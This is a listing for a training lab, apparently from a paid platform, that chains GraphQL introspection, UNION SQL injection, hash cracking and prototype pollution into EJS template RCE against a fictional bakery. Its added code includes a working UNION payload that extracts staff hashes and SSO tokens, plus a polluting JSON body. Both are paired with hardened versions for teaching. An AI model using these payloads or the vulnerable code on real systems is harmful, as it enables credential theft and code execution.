WEBVERSE


Hearth
Difficulty: medium | Tier: Pro

Hearth is a small Brooklyn artisan bakery with a public storefront and an internal CRM for wholesale operations. Their GraphQL menu API leaks more than the daily bread.

Tags: graphql, graphql-introspection, sql-injection, postgres, password-cracking, oauth-token-leak, prototype-pollution, ejs-template-injection, nodejs, rce
Stack: node, express, apollo-server, ejs, lodash, postgres, nginx

The Scenario

Hearth is a small Brooklyn bakery owned by Mickey, who started with sourdough out of a Bed-Stuy kitchen and grew into a wholesale operation supplying cafes, hotels, and restaurants across the city. The customer-facing storefront lists the day's bakes; the staff CRM — running on its own subdomain — handles wholesale accounts, daily order schedules, and team tasks.

Mickey's competitor's tech-savvy cousin claimed at a wedding last weekend that they'd "seen all the customer data." Mickey laughed it off. The next day three of Hearth's biggest wholesale accounts received cold-call pitches from that same competitor. Find the path. Start at the public storefront and end with proof you can read whatever's on Mickey's machine.

Lab Intel

Synopsis

Hearth runs a public Apollo GraphQL menu API and a separate staff CRM. A resolver concatenates a user-supplied argument straight into raw SQL, which leaks staff credentials and SSO tokens; the CRM's settings endpoint deep-merges request JSON with no filtering of prototype-reaching keys, and EJS does the rest.

Architecture

A medium-difficulty multi-service lab built on four containers — an nginx gateway, two Node.js surfaces (the public bakery storefront with Apollo Server and the staff CRM with sessions and EJS), and a Postgres backend. The chain combines GraphQL recon, UNION-based SQLi against a string-concatenated WHERE clause, bcrypt cracking forced because a leaked OAuth token only opens a low-priv session, and a prototype pollution sink that triggers RCE on the very next EJS template compile.

Who It's For

Built for intermediate testers comfortable enumerating modern web APIs and chaining several primitives. You should have prior experience with GraphQL introspection, UNION-based SQL injection, and basic Node.js internals. Familiarity with prototype pollution as a bug class is a plus but not required — the gadget itself is well-documented.

Skills You'll Practice

  • GraphQL schema enumeration via introspection
  • UNION-based SQL injection through a permissively validated query argument
  • bcrypt offline cracking with hashcat (-m 3200)
  • Differentiating low-priv OAuth replay sessions from admin sessions
  • Prototype pollution via `_.merge` and the EJS `outputFunctionName` RCE gadget
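The second bullet is the one that catches people who trust a validator. The following is an added example, not the lab's code and not Hearth's actual resolver: a helper that builds the Postgres query for a menu search, once by string concatenation and once with a bind parameter. The table and column names (menu_items, staff, sso_token) and the validator itself are assumptions chosen for illustration; the {text, values} shape is what node-postgres's client.query() accepts.

```javascript
// Added example, not the lab's code: a GraphQL-style resolver helper that
// builds a Postgres query for a menu search. Table and column names
// (menu_items, staff, sso_token) and the validator are assumptions made for
// illustration; the point is the difference between validation that looks
// strict and handling that is actually safe.

// "Safe-looking" validation: blocks statement separators and comment
// markers, caps the length, but must allow single quotes because product
// names such as "Mickey's Sourdough" contain them.
function looksSafe(search) {
  return typeof search === 'string'
    && search.length <= 120
    && !/;|--|\/\*/.test(search);
}

// Vulnerable: the argument is spliced into the WHERE clause as SQL text.
function buildMenuQueryUnsafe(search) {
  if (!looksSafe(search)) throw new Error('rejected by validator');
  return `SELECT name, description, category FROM menu_items WHERE name ILIKE '%${search}%'`;
}

// Hardened: the value travels as a bind parameter, in the {text, values}
// shape that node-postgres's client.query() accepts, so it can only ever be data.
function buildMenuQuerySafe(search) {
  if (!looksSafe(search)) throw new Error('rejected by validator');
  return {
    text: 'SELECT name, description, category FROM menu_items WHERE name ILIKE $1',
    values: [`%${search}%`],
  };
}

// A UNION payload that passes looksSafe: no semicolon, no comment marker.
// It closes the opening quote, appends a three-column SELECT (matching the
// original column count), and ends so that the template's trailing "%'"
// completes a true LIKE comparison instead of breaking the statement.
const unionPayload = "%' UNION SELECT email, password_hash, sso_token FROM staff WHERE '1' LIKE '1";

// Number of SELECT keywords in the SQL text: more than one means the input
// became part of the statement rather than staying data.
function selectCount(sql) {
  return (sql.match(/\bSELECT\b/gi) || []).length;
}

console.log(buildMenuQueryUnsafe(unionPayload));
console.log('unsafe SELECTs:', selectCount(buildMenuQueryUnsafe(unionPayload)));
console.log('safe SELECTs:', selectCount(buildMenuQuerySafe(unionPayload).text));
```

The validator rejects the obvious `'; DROP TABLE` shape and still lets the UNION through, because the quote it cannot block is all the injection needs. In the parameterised form the same payload arrives as a literal pattern and matches nothing.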

What You'll Gain

  • GraphQL recon: DevTools traffic capture, introspection, schema mapping
  • Recognising the difference between safe-looking input validation and actually safe input handling
  • Modern Node.js exploitation: prototype pollution from request body to template-engine RCE
  • Multi-service attack chaining: storefront → DB exfil → CRM auth → CRM settings → shell
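The last two bullets describe the request-body-to-template path in prose; the following added example shows it end to end in miniature. It is not the lab's code, lodash's code, or EJS's code: naiveMerge reproduces the bug class behind old `_.merge` (recursing into a `__proto__` key), compileTemplateSource reproduces only the shape of EJS's `var <outputFunctionName> = __append;` line, and the request body and marker names are constructed for the demonstration.

```javascript
// Added example, not the lab's or lodash's code: a CRM-style settings endpoint
// that deep-merges a JSON body into a settings object, and the EJS-style
// compile step that turns a polluted outputFunctionName into executed code.
// naiveMerge reproduces the bug class behind old _.merge in miniature;
// compileTemplateSource reproduces the shape of EJS's "var <name> = __append;"
// line, not EJS itself. The request body and marker names are constructed.

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Vulnerable deep merge: it recurses into every key of the source, including
// "__proto__". target["__proto__"] resolves to Object.prototype, so the nested
// keys become properties of every object in the process.
function naiveMerge(target, source) {
  for (const key of Object.keys(source)) {
    const val = source[key];
    if (isPlainObject(val)) {
      if (!isPlainObject(target[key])) target[key] = {};
      naiveMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Hardened deep merge: refuse the prototype-reaching keys and only descend
// into own properties of the target.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const val = source[key];
    if (isPlainObject(val)) {
      if (!Object.prototype.hasOwnProperty.call(target, key) || !isPlainObject(target[key])) {
        target[key] = {};
      }
      safeMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Constructed attacker body for the settings endpoint. The value is JavaScript
// that the compile step splices after "var ", so "x; <anything>; var y" runs <anything>.
// JSON.parse creates an own property literally named "__proto__".
const POLLUTED_BODY = `{"theme":"dark","__proto__":{"outputFunctionName":"x; globalThis.hearthMarker = 'polluted'; var y"}}`;

// Miniature of EJS compile: with outputFunctionName set, the generated
// function source gains a `var <name> = __append;` line, unescaped.
function compileTemplateSource(opts, bodyJs) {
  let src = 'var __output = "";\n'
    + 'function __append(s) { if (s != null) __output += s; }\n';
  if (opts.outputFunctionName) src += `var ${opts.outputFunctionName} = __append;\n`;
  return src + bodyJs + '\nreturn __output;';
}

// Render with a fresh options object: exactly the case that inherits a
// polluted property, because nobody set outputFunctionName on it.
function renderMenu() {
  const src = compileTemplateSource({}, '__append("<h1>Hearth menu</h1>");');
  return new Function(src)();
}

// Merge the attacker body with the vulnerable merge, then render.
// Cleans Object.prototype afterwards so the rest of the process is unaffected.
function runVulnerable() {
  const settings = naiveMerge({ theme: 'light' }, JSON.parse(POLLUTED_BODY));
  const html = renderMenu();
  const marker = globalThis.hearthMarker;
  delete Object.prototype.outputFunctionName;
  delete globalThis.hearthMarker;
  return { theme: settings.theme, html, marker };
}

// Same body through the hardened merge: theme still updates, nothing lands
// on Object.prototype, and the template compiles without the injected line.
function runHardened() {
  const settings = safeMerge({ theme: 'light' }, JSON.parse(POLLUTED_BODY));
  return {
    theme: settings.theme,
    html: renderMenu(),
    marker: globalThis.hearthMarker,
    inherited: 'outputFunctionName' in {},
  };
}

console.log(runVulnerable());
console.log(runHardened());
```

Nothing in the template itself changed between the two runs; the page renders identically either way. That is what makes the sink quiet: the pollution sits on Object.prototype until the next compile with an options object that never set outputFunctionName, and the injected code runs before the template body does.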

Ready to hack Hearth?

Upgrade to Pro to unlock this lab and the full library.